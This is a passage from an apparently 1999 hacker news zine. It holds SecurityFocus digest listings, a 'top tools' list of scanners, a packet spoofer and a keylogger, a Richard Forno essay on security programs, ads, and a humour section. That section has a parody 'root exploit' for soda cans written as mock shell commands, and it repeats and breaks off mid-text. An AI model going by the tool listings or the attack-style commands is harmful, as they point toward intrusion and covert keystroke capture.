http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=01fd01bf1669$99f4d600$431ba396@montes.lac.inpe.br 9. Intrusion Detection rfc draft Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-15&msg=199910152054.QAA08702@iridium.mv.net 10. directed broadasts to UDP ports 41508, 41524, 41530. Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-15&msg=199910171958.PAA08727@rum.cs.rochester.edu V. VULN-DEV RESEARCH LIST SUMMARY 1999-10-04 to 1999-10-19 ---------------------------------------------------------- 1. Re: Guestbook perl script (error fix - Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=37F95DCC.948D1E78@thievco.com 2. The PcWeek crack Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=37F95F46.28909284@thievco.com 3. Re: Cisco IOS password types overview. (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=19991004181832.A7373@noc.untraceable.net 4. Timbuktu32 (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=37F9879E.A4A0603A@thievco.com 5. Re: solaris DoS (fwd) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=Pine.LNX.4.10.9910042219160.22584-100000@noella.mindsec.com 6. FW: puzzlecrypt(tm--dr) (hint:sploit against dr - so I don't go deaf) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=LPBBLGAAOGLDBEMOMNAKGENBCAAA.dr@v-wave.com 7. Newbie in Jeopardy Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=19991006202821.17986.rocketmail@web1006.mail.yahoo.com 8. Window manager - implementation bug/feature ??? (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=19991007042501.WPTW29939.mta02@onebox.com 9. fbsd 3.3 ospf_monitor research (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-8&msg=19991008202347.17546.qmail@nwcst293.netaddress.usa.net 10. SSH and X11 forwarding Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-8&msg=19991008154553.A7420@sec.sprint.net 11. NT SysKey should be breakable (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-8&msg=37FE5604.E3DDEE4B@enternet.se 12. 2 dodgy network programs Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-8&msg=199910091022.LAA02585@notatla.demon.co.uk 13. Free BSD 2.2.x listen() problem / FTP exploit Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-15&msg=9628.991015@SECURITY.NNOV.RU 14. Classes? Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-15&msg=004301bf17b3$00563de0$5016aacf@verti.com 15. possible gnome remote overflow Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-15&msg=380B7985.1FAB00E@rconnect.com VI. SECURITY JOBS SUMMARY 1999-10-04 to 1999-10-19 --------------------------------------------------- Discussion: 1. yet another question about entering the security field (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=19991005205523.1111.qmail@securityfocus.com Seeking Position: 1. Contact: I am looking for a good company to work for NYC - Edward Saxon, Qualifications: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&thread=19991005000908.57894.qmail@hotmail.com 2. Contact: Looking for security system administration position - Ender Wiggin, Mike@aviary-mag.com Qualifications: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=016701bf0eab$26b42580$5f47fea9@25te1 Seeking Staff: 1. Unix/Network/Security Engineer - NYC Reply to: beau@nyc-search.com Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=37F9492A.5BDA96EC@nyc-search.com 2. Developer needed - San Mateo - California Reply to: Alfred Huger, ah@securityfocus.com Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=Pine.GSO.4.10.9910051306001.20005-100000@www.securityfocus.com 3. Unix/Network Security Engineer Needed In Maryland Reply to: Brian Mitchell Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=007301bf103b$bc3a1060$120210ac@icscorp.com 4. Domain Expert / Security Development / IT / Logistics #123 Reply to: Lori Sabat Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=19991006130555.1532.qmail@securityfocus.com 5. Security Verification Analyst #123 Reply to: Lori Sabat Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=19991006131420.1670.qmail@securityfocus.com 6. looking for information security manager.... Reply to: Bryan Bushman Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=00069FC7.C22211@capitalone.com 7. Job opportunities in San Jose Reply to: Beth Friedman Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-8&msg=19991011182755.28416.qmail@securityfocus.com 8. 3com Job Posting Reply to: andy_mcdaniel@3com.com Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-8&msg=8825680B.000B3EAF.00@hqoutbound.ops.3com.com VII. SECURITY SURVEY 1999-10-04 to 1999-10-19 ---------------------------------------------- The question for 1999-10-04 to 1999-10-19 was: "Do you think the recent changes to US encryption export law will increase the use of encryption on in the internet?" Results: Yes 30% / 41 votes No 69% / 92 votes Total number of votes: 133 votes III. SECURITY FOCUS EVENTS for 1999-10-04 to 1999-10-19 --------------------------------------------------------- 1. New Scoring and Comments under Tools, Products, Library and Links Relevant URL: http://www.securityfocus.com/level2/bottom.html?go=announcements&id=35 Summary: You can now score and comments on items in the tools, products, library and links sections of the site. Tell others what you think of certain items. Learn what others think are the best resources. To vote you must be a registered user and sign-in. 2. New Guest Feature - THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2 Relevant URL: http://www.securityfocus.com/level2/bottom.html?go=forums&forum=2&id=327 Summary: There is a three-fold and ultimate goal of any organizational information security program. Simply put, such a program must take adequate measures to protect and provide levels of confidentiality, integrity, and availability of information resources. Yet all too often security is bypassed or ignored because it is too imposing, too complicated, and not perceived as an asset to the organization by both management and employees. A common misperception is that increased security leads to decreased convenience or "creature comforts." Not necessarily. Security of a corporation's information can be strong, robust, and secure without presenting a large burden on the user community. IX. SECURITY FOCUS TOP 6 TOOLS 1999-10-04 to 1999-10-19 -------------------------------------------------------- 1. UCGI Vulnerability Scanner 1.56 by su1d sh3ll Relevant URL: http://infected.ilm.net/unlg/ CGI vulnerability scanner version 1.56. Checks for over 90 CGI vulnerabilities. Tested on slackware linux with kernel 2.0.35-2.2.5, Freebsd 2.2.1-3.2, IRIX 5.3, DOS, and windows. 2. NTInfoScan by David Litchfield Relevant URL: http://www.infowar.co.uk/mnemonix/ntinfoscan.htm NTInfoScan is a security scanner designed specifically for the Windows NT 4.0 operating system. It's simple to use - you run it from a command line - and when the scan is finished it produces an HTML based report of security issues found with hyper-text links to vendor patches and further information. NTInfoScan is currently at version 4.2.2. It tests a number of services such as ftp, telnet, web service, for security problems. Added to this NTInfoScan will check NetBIOS share security and User account security. 3. SuperScan 2.0.4 by Robin Keir Relevant URL: http://members.home.com/rkeir/software.html This is a powerful connect-based TCP port scanner, pinger and hostname resolver. Multithreaded and asynchronous techniques make this program extremely fast and versatile. Perform ping scans and port scans using any IP range or specify a text file to extract addresses from. Scan any port range from a built in list or any given range. Resolve and reverse- lookup any IP address or range. Modify the port list and port descriptions using the built in editor. Connect to any discovered open port using user- specified "helper" applications (e.g. Telnet, Web browser, FTP) and assign a custom helper application to any port. Save the scan list to a text file. Transmission speed control. User friendly interface. Includes help file. 4. PacketX by NTObjectives Inc. Relevant URL: http://www.ntobjectives.com PacketX is a native Windows NT firewall testing tool that allows for complete TCP/IP packet creation and provides businesses a method for verifying a firewall vendors product claims. Featuring packet spoofing technology and raw packet creation techniques, this tool is essentially a packet cannon that shoots custom packets at a firewall in order to verify the approval/denial of internet domain address against firewall ACL's. 5. Achtung by Codex Data Systems Relevant URL: N/A A Windows keylogging program by Codex Data Systems. 6. Custom Attack Scripting Language by Thomas Ptacek & Timothy Newsham Relevant URL: N/A Custom Auditing Scripting Language (CASL) implements a packet shell environment for the Custom Auditing Scripting Language that is the basis for the Cybercop(tm) line of products by Network Associates. The CASL environment provides an extremely high performance environment for sending and receiving any normal and/or morbid packet stream to firewalls, networking stacks and network intrusion detection systems as well as being sufficiently rich of a language to write honeypots, virtual firewalls, surfer hotel, phantom networks and jails. X. SPONSOR INFORMATION - Tripwire Security ------------------------------------------ URL: http://www.tripwiresecurity.com/ This Newsletter was sponsored by Tripwire Security. Tripwire Security Systems, Inc. (TSS) is a Portland-based software development company specializing in system security and policy compliance applications. The company is developing a family of Defense in Depth(SM) security solutions based on its Tripwirefile integrity assessment technology. Tripwire's file integrity assessment technology is the most fundamental component of any Intrusion Detection system. Tripwire monitors all servers and clients on a network, detecting and reporting any changes to critical system or data files. Tripwire can absolutely, unequivocally determine if a protected file has been altered in a way that violates the policy set by the administrator. This ensures that any change, whether due to an external intruder or internal misuse, will be identified and documented on a timely basis. After an intrusion has been detected, Tripwire enables the system administrator to quickly identify which systems have been compromised, allowing the organization to get back to business. Alfred Huger VP of Operations Security Focus @HWA 94.0 THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.securityfocus.com/ by Richard Forno Tue Oct 19 1999 THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2.0 RICHARD FORNO FALL 1999 There is a three-fold and ultimate goal of any organizational information security program. Simply put, such a program must take adequate measures to protect and provide levels of confidentiality, integrity, and availability of information resources. Yet all too often security is bypassed or ignored because it is too imposing, too complicated, and not perceived as an asset to the organization by both management and employees. A common misperception is that increased security leads to decreased convenience or "creature comforts." Not necessarily. Security of a corporation’s information can be strong, robust, and secure without presenting a large burden on the user community. To reach this objective, it is essential to conduct a proactive "perception management" analysis (PMA) within the organization as part of an ongoing self-evaluation of the security program. The PMA must ask these questions: 1. Does our security program adequately address the fundamental principles of Confidentiality, Integrity, and Availability? (mentioned below) 2. Is there appropriate support and "buy-in" from management and users? 3. Is it "doable"? The first two questions are issues unto themselves and quite self-explanatory. The third, however, is a key facet to a security program and the objective of this article. Contrary to popular belief, security programs do NOT have to be complicated, but they MUST fulfill their requirements by being secure and ongoing. That is its singular goal. Large, bloated, securitymodels lead to inefficiency in management, communications, resource allocation, security operations, and employee compliance with requirements. Unfortunately, as information movesfaster than corporate actions, so too does the level of threats, vulnerability, and risk to such information at your company. This article will discuss the elements of a Perception Management Analysis in evaluating a corporate security posture. It is important to remember that for this article, "information security" is not limited to "computer security" but includes computers, networks, data, the infrastructure required to convey proprietary data to another person (such as cellular phones and pagers) and the day-to-day human factors involved with the exchange of information. To further illustrate that security must be "doable" and understandable by everyone in the organization, this article is written in "plain English" with several tongue-in-cheek observations and comments. It’s a known fact that simple stuff presented in clear, concise language will be understood by a greater audience. A little humor never hurts, either. PMA 1 Does it meet the fundamental principles (or Requirements) of information security? The following three principles can be addressed through appropriate policies, procedures, and standards of conduct for your corporate information resources. It is essential to understand that without proper, written security policies approved by your senior management, there is no baseline to either measure the effectiveness of your security program or enforce securityrequirements, policies, or procedures within your organization. The three guiding principles that form the foundation for a good security program are: CONFIDENTIALITY: This is simply keeping your company information private. Just like the spy agencies take great precautions to protect theirs, so too must corporations secure their data from domestic or foreign competitors, criminals, and any other malcontent. The last thing you want are the plans or schematics for the "Super-Secret Widget 2000" to appear in the Los Angeles Times or even worse, find that your competitor has released the "Not-A-Super-Secret-Anymore Widget 2000 Plus" before you do at a lower price, and therefore undercut your market and stealyour profits while leaving you to pick up the R&D tab! Any organization that is operated by people has inherent vulnerabilities. Therefore, to insure confidentiality of your corporate information, start with the people. Develop and require signed non-disclosure and information resources acceptable use statements fromall employees, from CEO to New Hires. As time progresses, or your requirements for confidentiality grow, deploy encryption or authentication technologies and use automated technical means to provide information confidentiality. Just remember thatpeople will need to use these tools…and that in and of itself provides a great vulnerability 1 . 1 People, particularly Americans, are all too trusting of others. It is very easy to trick someone into revealing their passwords or access codes over the phone or even in person by impersonating an "expert" or someone from Network Support. INTEGRITY: Protecting information so that it cannot be surreptitiously manipulated for an adversary’s gain is critical. When your company books are audited, moving even one decimalpoint in a spreadsheet could prove disastrous. A $4.5 million loss may be expected or easy to swallow, but how would a $45 million loss look (or taste) if you’re upper management? We DO live in an age where they don’t shoot the messenger, right? An organization that is operated by people has inherent vulnerabilities. Therefore, to insure the integrity of your corporate information, start with the people. Develop aprocess of background checks for key people such as systems and database administrators, security staff, and those who have "detailed, unmonitored, insideraccess" to your corporate information resources and would be in a position to easily co-opt your sensitive data. Insure your data is regularly backed up and stored in a mannerrepresentative of the sensitivity of the data itself. Software- and Management-based preventive measures to protect your data can’t hurt either. Above all, never blindlybelieve what you see on the screen. Double check your work and numbers…an age-old remedy to prevent big mistakes! AVAILABILITY: Simply put, your employees need to work in a technological environment that is supportive of them doing their jobs. Paying people to come to work and play Solitaire on their computers since they cannot access the network or their files is a waste of time, labor, and resources. You must insure information resources (networks, systems, and the informationcontained or processed within) are running to insure productivity. An organization that is operated by people has inherent vulnerabilities. Therefore, to insure the availability of your corporate information, start with the people. Developmethods to insure authorized users cannot inadvertently bring down a network or jam-up the e-mail system. Insure that your network administrators provide for redundancy ofinformation resources, stand-by power, backup capabilities, and related services. Any organization that is run by people has inherent vulnerabilities. That’s due to the fact that most people are unaware of their security responsibilities or security issues, threats, and risks to their information. They are unassuming when it comes to how a system should perform 2 . A company may spend millions on firewalls and encryption technologies – and believe that they have the Good CyberKeeping Seal of Impenetrable Security -- but their secrets still get out. If you have closed off all technical routes for information to escape, what routes, pray tell, are left for information to be disclosed, damaged, or denied access? You guessed it, partner The people. Is there any redundancy here? Where does it seem the greatest security risk to your information come from? Hardware failures? Sometimes. Acts of God? Occasionally. People? Youbetcha…ninety percent of the time. But rest assured, O Security Officer, for if you have adequately addressed these three areas through appropriate policy and procedure, your security program is off to a good start! 2 It is very common for a person to have a system error message alert pop up every morning for six months before anything is done to remedy the problem. The user in question’s answer was "I thought that was supposed to be that way." PMA 2 Is there appropriate management support and "buy in" for your security program at all levels of your organization? All too often, information security programs are thrown together retroactively after an incident has occurred or when someone on the top floor hears about a "hacker" story on the morning news and in their executive wisdom decides to do something about it. What they are going to do they have no idea…but "we’ve got to do something, quick!" My experience in helping establish the Information Security Office for the US House of Representatives was indicative of this mindset. One incident that comes to mind is when a seniorHouse Member was on vacation in Florida where his cellular phone traffic was picked up by a third party who then transmitted their recordings of his conversation to the local and national media. Suffice it to say, there was a considerable amount of political embarrassment for this Congressman. The following Monday, our office was tasked to develop a guidance document for"proper cellular phone usage" and locate secured (i.e., encrypted) cellular phones for Member use. By Thursday we had a report and quasi-policy document making its way to the House leadership on our findings and recommendations. The next week, our "guidance document" on cellular phone use was approved by the House leadership and sent out to all Members. However, the four-inch thick Agency-wide information security policy document requested by the House leadership took nearly eighteen months to be approved. Why? Internal requirements (such aspassword lengths or aging) were not as "glamorous" or highly-visible as a Congressman’s intercepted and well-publicized phone conversation. And, as the 434 other Congressmen usedcellular phones as well, there was a nearly unanimous buy-in from the "users" of the system. A security program is effective only when implemented and properly maintained. However, the strongest management and user support of security programs is usually centered on the fallout after an embarrassment or incident occurs…corrective versus preventive actions to remedy a newly-discovered vulnerability or comply with a federal or corporate mandate. Directives resulting from Duress are not the best way to build a security program. To get upper management support for security requires tact and an ability to clearly outline and convey the level of risk facing the corporation in a manner that stresses the risks to the corporation most upper managers are interested in avoiding: loss of public or client confidence, the waning of shareholder support, and most importantly, the potential financial losses to the corporation. The following bullets provide some general guidance statements to assist corporate security officers in "selling security" to upper management: Senior management support is essential in establishing a robust security program, especially in approving policies, procedures, and budget requests for security products. However, to maintain an effective security program, it is critical to involve the user community in the security program and foster a "security mindset" throughout the organization. Believe it or not, most of what constitutes good security practices can be described as common sense! But, for those readers who have gotten used to my bullet lists in the above paragraphs, selling security to users is best accomplished by: - Maintaining an open communications with your users. Don’t just throw together a website containing security information. Make sure that site is regularly updated (giving users a reason to revisit the site), and users not only have a way to contact the security group, but that the security group contacts the user community with important information through the use of timed e-mail announcements, columns in company newsletters, and other awareness material promogulated throughout the corporation. Above all, never be afraid to listen to your users. Be approachable and never remain on your "pedestal" behind the locked doors of the security office. - Being proactive in security awareness. While you may not use America Online at the office, it is a good bet many of your employees do. Should your security group learn of a vulnerability in the AOL software, pass it on to your user base as "for your information" material. This demonstrates a level of concern for your users security posture beyond the perimeter of your corporate castle. If users feel that you are looking out for their "cyber-safety" as well as that of the corporation, user support for security procedures will grow exponentially. At the House, I went on "the offensive" in gathering intelligence on the threats to our information resources. By attaining the widest and most detailed "Big Picture" of the threats facing your organization you will be better equipped to prepare for and respond to such threats. - Making security transparent. Yes, it may make your system "iron-clad" to require twenty passwords, fingerprint identification on the workstations, DNA codes to check electronic mail, retinal scans, and requiring the user to sing the first verse of "America The Beautiful" to log into the corporate network, but you will pay a substantial price not only in equipment to process such personal identification, but in employee support and willingness to comply with a security program that has more requirements for logging into a computer than for getting a backstage pass at a Hanson concert. This leads to employees skirting security, writing down (or sharing) their passwords with others or leaving their computers logged in after close of business. Security must not place unnecessary burdens on the employees, and it does not have to in order to provide adequate security. In particular, strong passwords and the logging of all system activity is a good place to start for most organizations. Naturally, special situations (such as needing dial-in access or access to sensitive networks) require additional security, but that is "part and parcel" of the added requirements the employee has in accepting his responsibilities that force him/her to access to such systems. - Insuring people know their responsibilities. Nothing is worse than finding out that your mission-critical systems administrator didn’t know that he/she was responsible for securing that e-mail server. Building security knowledge into every job description and insuring managers at all levels know their security roles and responsibilities will further support the security culture you are attempting to create. PMA 3 Is it "doable"? The million-dollar question that I don’t know the answer to. You will, after several hours of meetings and group soul-searching as to the effectiveness of your security program. A proper information security program should not place unnecessary burdens on the employees, be cost-prohibitive to the company, or confusing to those who administer it. Are your policies, standards, incident response call-out rosters and procedures known by those who need to know? Are they understandable and available for anyone to reference, or are your security policies and procedures dusting away on an obscure bookshelf? Is there too much bureaucracy? Are policies and procedures poorly written and thus ignored or unknown to your users? Do your users seem confused? Have you had incidents resulting from any of these shortcomings? If the answer to any of these questions is "yes" you need to examine the levels of complexity of your securityprogram. The military concept of unity of command is a key element in answering this question. Ideally,the information security group should not be placed within the operations staff of a company’s information resources group. Rather, it should be placed as a special office with a direct link to the corporate Chief Information Officer (or higher) where it is not burdened with layers of administrative and operational bureaucracy. In Washington, as elsewhere in the world, how wellyou are perceived and paid attention to depends greatly on Where You Sit within the organization. Again, I reflect on my activities at the US House of Representatives. The Information Security Program Office was located immediately under the Chief Information Officer at the division level, right alongside the five other line departments within the House Information Resources organization. This allowed the Security Group senior-level access across the entire IT organization while providing a clear, unfettered, line of communication to the Chief Information Officer and other House offices on sensitive issues. This level of interaction among the various division managers fostered a very cooperative spirit between the Security Team and the other divisions. Now as I work for a major Internet Services company, my team (the Corporate Security Group) reports to the Chief Technology Officer, and through him, the CEO, and the results are the same: being positioned at this level greatly facilitates interaction with other senior managers and across the various departments and business units, and allows the security group to accomplish its mission. Unfortunately, in too many environments, the security staff is located deep within the networkservices department, which effectively bars it from fulfilling its enterprise-level responsibilities and visibility as anything more than a "computer support" office. The security group must also be free to interact with various external organizations (ranging from law enforcement to other security teams and divisions within the company) without having to receive constant approval from many layers of upper bureaucracy. As mentioned, information travels very quickly, and thethreats to such information affect companies even quicker. The security group must be free to ascertain an incident, call in the appropriate personnel, perform "cyber-triage" and work with other systems staff and organizations to resolve the situation without having to ask "May I?" to non-technical (read: "clueless") management every step of the way 3 . Your security group’s freedom to operate more autonomously than other offices in your company depends completely on how well you have cemented your relationship with both senior management and your fellow division chiefs and their staffs. Nothing is worse than receiving apager call and assembling your response team to discover that the systems people responsible for the system under attack have ignored your call for help or are not as committed to near-real-time incident response as your security team is. The commitment of other system administrators and other technical staff to participating in a cohesive (proactive and reactive) security activity depends greatly on how you interact with them during non-crises. Remember what wasmentioned above – You are human, do NOT know it all, and above all, need the help of people outside your group to effectively run a security program. Being aloof and "untouchable" will only deny you the support you need in running a security program. Support others when they need it, and they will support you when you need it (and your job is on the line!) So, is it doable? It is if you have a team. Personally, I would rather take technically qualified folks who are first and foremost team players and turn them into a high-performance team of security professionals than lead a group of security professionals who can’t be a team. 3 Such latitude is usually given the security group after the upper management has grown to respect the security team through its past performance in the organization. The hard part is earning that level of respect that provides you that level of operational autonomy. Conclusions Hopefully, at this point in the article, you have learned some "insider tips" and lessons learnedabout how to develop and maintain a high-performance information security organization. If not, you’re out of luck until the next issue. It’s not that difficult, really. You have been forewarned about the two key challenges to your security program: Selling it to Management and Selling it to Users. Keeping your "doability" factor in mind will facilitate both activities…and believe me, they are tough sales! Evaluating the simplicity of your program will illuminate the potential bottlenecks and barriers to successful security postures and awareness within your organization.May you go forth and protect your information resources armed with the knowledge of today and the foresight of tomorrow. Thus endeth the sermon. @HWA -=----------=- -=----------=- -=----------=- -=----------=- 0 0 0 o O O O 0 =----------=- -=----------=- -=----------=- -=----------=- -=----------=- =----------=- -=----------=- -=----------=- -=----------=- -=----------=- HWA.hax0r.news AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** When people ask you "Who is Kevin Mitnick?" do you have an answer? www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre http://www.2600.com/ http://www.kevinmitnick.com +-----------------------------------------------------------------------------+ | SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE | | =================== http://smog.cjb.net/ NEWS on SECURITY | | NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET | | http://smog.cjb.net/ NEWS on TECHNOLOGY | +-----------------------------------------------------------------------------+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net * * http://www.csoft.net" One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous... ____ _ _ _ _ _ / ___| ___ _ __ __| (_)_ __ _ _ ___ _ _ _ __ / \ ___ ___(_|_) \___ \ / _ \ '_ \ / _` | | '_ \| | | |/ _ \| | | | '__| / _ \ / __|/ __| | | ___) | __/ | | | (_| | | | | | |_| | (_) | |_| | | / ___ \\__ \ (__| | | |____/ \___|_| |_|\__,_|_|_| |_|\__, |\___/ \__,_|_| /_/ \_\___/\___|_|_| |___/ / \ _ __| |_ / _ \ | '__| __| / ___ \| | | |_ /_/ \_\_| \__| TOO, for inclusion in future issues Do the HWA logo etc and we'll showcase it here to show off your talents...remember the 80's? dig out those ascii editors and do yer best... _| _|_|_| _|_| _|_|_|_| _| _| _| _| _| _| _| _| _| _| _|_|_| _|_| _|_| _| _|_| _| _|_| _| _|_| _|_| _|_| _|_|_|_| _| _|_| _| _| _| _| _| _|_| _| _| _| _| _| _| _| _|_| _|_| _|_| _| _________________________ /| /| | | ||__|| | HAX0R FOR HIRE ... | / O O\__ | / \ WILL HACK FOR NETWORK | / \ \ ACCESS! | / _ \ \ --------------------- / |\____\ \ || / | | | |\____/ || / \|_|_|/ | __|| / / \ |____| || / | | /| | --| | | |// |____ --| * _ | |_|_|_| | \-/ *-- _--\ _ \ // | / _ \\ _ // | / * / \_ /- | - | | * ___ c_c_c_C/ \C_c_c_c____________ _________ (Ascii art from V0iD magazine #7) Contributed by VeRtIgO (who did the .avi included in this week's .zip file) [19:43] Bill Gates is the Antichrist * Revelation 13:18 says: * * Here is wisdom. Let him who has understanding calculate the * number of the beast, for it is the number of a man: His * number is 666. The real name of the Bill Gates is William Henry Gates III. Nowadays he is known as Bill Gates (III), where "III" means the order of third (3rd.) By converting the letters of his current name to the ASCII- values (which are used in computers) you will get the following: B I L L G A T E S 3 66 + 73 + 76 + 76 + 71 + 65 + 84 + 69 + 83 + 3 = 666 """ ----------------------------------------------------------------------------------------- Amusing Opcodes BNE - Branch to Non-Existent code BNR - Branch for No Reason. BRA - Branch to Random Address BVS - Branch to Virtual Subroutine CLD - CalL a Doctor CMD - Create Meaningless Data. DEC - DElete the Code DRA - Decrement Random Address. EDR - Emit Deadly Radiation. JMP - Jump if Memory Present (conditional jump) LLI - Lose Last Instruction. PRS - Push Results off Stack. RIS - Remain In Subroutine. RTI - Return from the Infinity SHB - Scramble High order Bit. TEC - Take Extra time for Calculation. ----------------------------------------------------------------------------------------- Remote exploit for Pepsi and Coke cans ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://packetstorm.securify.com/ -----BEGIN PGP SIGNED HUMOR----- Hash: SHA1 It seems cans of Pepsi and Diet Pepsi have a possible remote root problem on them. While recently eyeing a can of coke while sitting on my terminal I noticed that I could actually drink from it while standing at a distance of at least 3 feet. The sploit: Now when I first did this I was amazed and had to have a couple friends test it out before I submitted it so here it is... ssh root@box.of.straws password ******** login denied ssh root@box.of.dixie.straws password ******** Welcome to Dixie Straws #[skr1ptkid@dixie.straw]su [s/key 99 xp03r33t] #[skr1ptkid@dixie.straw]skey 99 xp03r337 Enter secret password: DONT REWT THIS BOXN PLSE #[skr1ptkid@dixie.straw]su [s/key 99 xp03r33t] Response:DONT REWT THIS BOXN PLSE # # #cat straw straw straw straw >> super.straw #mv superstraw ~/.superstraw *note... had to rename as .superstraw to hide from a normal ls* # #cd ~ #ftp can.of.coke #(username) anonymous #(password) mike@hunt.com *note uberleet alias* #prompt #mput ~/.superstraw #quit ================================================ Now there is no known resolution to this problem as of yet, but I will be working to ensure that no one else remotely close to my can of coke can root it. Temporary fix: I personally suggest something along these lines of security. =================================================== # !/dev/mouth # sil@antioffline.com # securepep.sh PATH=/dev/ echo SecurePep.v1 /bin/tar -cf saliva.tar ~/mouth/* scp saliva.tar root@can.of.coke:/; tar -xvf saliva.tar echo Now no one wants to drink any =================================================== Now this obviously has been done for fun, so cheers to those who enjoy a laugh and a big =P to those who don't... You only live once ;) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Yours Truly Sil of AntiOffline sil@antioffline.com http://www.antioffline.com mirrors: http://psyk0tik.mifits.org || http://xp0rnstar.self-evident.com sil@macroshaft.org http://www.macroshaft.org mirrors: http://total.misfits.org sil@self-evident.com http://www.self-evident.com "Windows -- "When do you want to reboot today?"" ID 0x1281EC4F DH/DSS 4096/1024 CIPHER: CAST PGP Fingerprint 46C0 6A83 E6D2 FEA6 383A B9A6 44D3 4E77 1281 EC4F iQA/AwUBN6d/aETTTncSgexPEQLuAgCfRF5dpZii9yEPnqZ+F+ AEbzB+KL0An3mXPk+Y8lZxkr0crgw72zPX5w71=tCpK -----END PGP SIGNATURE----------BEGIN PGP SIGNED HUMOR----- Hash: SHA1 It seems cans of Pepsi and Diet Pepsi have a possible remote root problem on them. While recently eyeing a can of coke while sitting on my terminal I noticed that I could actually drink from it while standing at a distance of at least 3 feet. The sploit: Now when I first did this I was amazed and had to have a couple friends test it out before I submitted it so here it is... ssh root@box.of.straws password ******** login denied ssh root@box.of.dixie.straws password ******** Welcome to Dixie Straws #[skr1ptkid@dixie.straw]su [s/key 99 xp03r33t] #[skr1ptkid@dixie.straw]skey 99 xp03r337 Enter secret password: DONT REWT THIS BOXN PLSE #[skr1ptkid@dixie.straw]su [s/key 99 xp03r33t] Response:DONT REWT 